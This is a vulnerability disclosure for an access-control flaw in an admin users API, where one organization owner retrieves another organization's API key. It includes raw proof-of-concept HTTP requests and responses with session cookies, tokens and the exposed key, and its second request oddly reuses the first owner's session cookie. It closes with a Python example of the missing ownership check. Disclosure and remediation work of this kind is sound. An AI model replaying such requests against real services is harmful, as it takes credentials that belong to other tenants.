Description

Organization owners can view the generated API KEY and USERS of other Organization Owners using the
http://192.168.26.128:8080/admin/api/users/<user_id>
endpoint, which exposes the details of the provided user id. The API KEY is shown in the username field of the returned user.

Proof of Concept

Original Request of OrgOwner 1

GET /admin/api/users/12 HTTP/1.1
Host: 192.168.26.128:8080
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
X-XSRF-TOKEN: 1e9c573e-8f7f-4a14-aa1a-e411f6911626
Referer: http://192.168.26.128:8080/admin
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SESSION=b1a585a8-7e9d-4e86-89ee-6e36c554a048; XSRF-TOKEN=1e9c573e-8f7f-4a14-aa1a-e411f6911626
Connection: close

Original Response from OrgOwner1's request

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Apr 2023 15:15:01 GMT
Set-Cookie: XSRF-TOKEN=1e9c573e-8f7f-4a14-aa1a-e411f6911626; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/json;charset=utf-8
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding, User-Agent

{"id":12,"organizationId":2,"role":"SUPERVISOR","username":"6b625cf8-90ef-430b-a3f5-fb37d3cf72d0","firstName":"apikey","lastName":"","emailAddress":"","type":"API_KEY","validTo":null,"description":"This is ORG1 API KEY For Check-In Supervisor","validToAsDateTime":null}

Modified Request from OrgOwner2

GET /admin/api/users/12 HTTP/1.1
Host: 192.168.26.128:8080
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Referer: http://192.168.26.128:8080/admin
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
X-XSRF-TOKEN: 42200ced-bf1e-4287-b031-a0f09131fc23
X-CSRF-TOKEN: 42200ced-bf1e-4287-b031-a0f09131fc23
Cookie: XSRF-TOKEN=42200ced-bf1e-4287-b031-a0f09131fc23; SESSION=b1a585a8-7e9d-4e86-89ee-6e36c554a048

Response from OrgOwner2's request

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Apr 2023 15:15:01 GMT
Set-Cookie: XSRF-TOKEN=1e9c573e-8f7f-4a14-aa1a-e411f6911626; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/json;charset=utf-8
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding, User-Agent

{"id":12,"organizationId":2,"role":"SUPERVISOR","username":"6b625cf8-90ef-430b-a3f5-fb37d3cf72d0","firstName":"apikey","lastName":"","emailAddress":"","type":"API_KEY","validTo":null,"description":"This is ORG1 API KEY For Check-In Supervisor","validToAsDateTime":null}

Impact

Organization owners can get the API KEY of other organization owners and use it to access/edit data.
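The root cause shown above is an object-level authorization gap: the endpoint resolves the record by id without checking that the requesting organization owner actually owns the organization the record belongs to. The following Python is an added example (not code from the report or from the affected application) that models the missing check. The user record is the JSON body from the responses above; the Principal type, the requester names, the organization ids assigned to them, and the handle_request wrapper are all constructed for this example.

```python
"""Organization-scoped lookup for an /admin/api/users/<user_id> style endpoint.

Added example. It models the authorization check that the report shows is
missing: a record is only returned when the requester owns the organization
it belongs to (or is a platform-wide administrator).
"""
from dataclasses import dataclass, field
from typing import Optional, Tuple

# Sample record taken from the report's response body (user 12, organization 2).
USERS = {
    12: {
        "id": 12,
        "organizationId": 2,
        "role": "SUPERVISOR",
        "username": "6b625cf8-90ef-430b-a3f5-fb37d3cf72d0",
        "firstName": "apikey",
        "lastName": "",
        "emailAddress": "",
        "type": "API_KEY",
        "validTo": None,
        "description": "This is ORG1 API KEY For Check-In Supervisor",
        "validToAsDateTime": None,
    },
}


@dataclass(frozen=True)
class Principal:
    """Authenticated requester. Constructed for this example; the set of
    organizations a requester owns would come from the session in practice."""
    name: str
    org_ids: frozenset = field(default_factory=frozenset)
    is_admin: bool = False


class Forbidden(Exception):
    """Raised when the requester may not read the record. Kept distinct from
    'not found' so the denial can be logged as a cross-organization attempt."""


def vulnerable_get_user(user_id: int) -> Optional[dict]:
    """The behaviour demonstrated in the report: the record is looked up by id
    only, so any authenticated organization owner receives it."""
    return USERS.get(user_id)


def get_user(principal: Principal, user_id: int) -> Optional[dict]:
    """Hardened lookup: the record's organizationId must be one the principal
    owns. Returns None for unknown ids, raises Forbidden for cross-org access."""
    record = USERS.get(user_id)
    if record is None:
        return None
    if principal.is_admin or record["organizationId"] in principal.org_ids:
        return record
    raise Forbidden(f"{principal.name} may not read user {user_id}")


def handle_request(principal: Principal, user_id: int) -> Tuple[int, Optional[dict]]:
    """HTTP-style wrapper returning (status, body). Both 'unknown id' and
    'not your organization' map to 404 so the response does not confirm which
    ids exist in other organizations; the Forbidden case is still
    distinguishable server-side for logging."""
    try:
        body = get_user(principal, user_id)
    except Forbidden:
        return 404, None
    if body is None:
        return 404, None
    return 200, body


if __name__ == "__main__":
    # Constructed requesters: OrgOwner1 owns organization 2, OrgOwner2 owns 3.
    owner1 = Principal("OrgOwner1", frozenset({2}))
    owner2 = Principal("OrgOwner2", frozenset({3}))
    print("vulnerable, OrgOwner2:", vulnerable_get_user(12)["username"])
    print("hardened, OrgOwner1:", handle_request(owner1, 12)[0])
    print("hardened, OrgOwner2:", handle_request(owner2, 12)[0])
```

The same ownership check belongs on every route that takes a user id, including edit and delete, not only on the read shown in the report; a check added to one handler leaves the others as the next IDOR.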